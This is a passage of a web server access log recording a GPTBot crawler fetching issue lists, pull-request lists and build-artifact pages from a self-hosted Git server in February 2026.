"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" +[17/Feb/2026:19:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" +[17/Feb/2026:19:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" +[17/Feb/2026:19:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:19:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:19:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:19:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:19:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" +[17/Feb/2026:19:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" +[17/Feb/2026:19:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10252] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:17:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10079] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:17:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10258] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10084] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10250] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:19:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:19:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:19:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 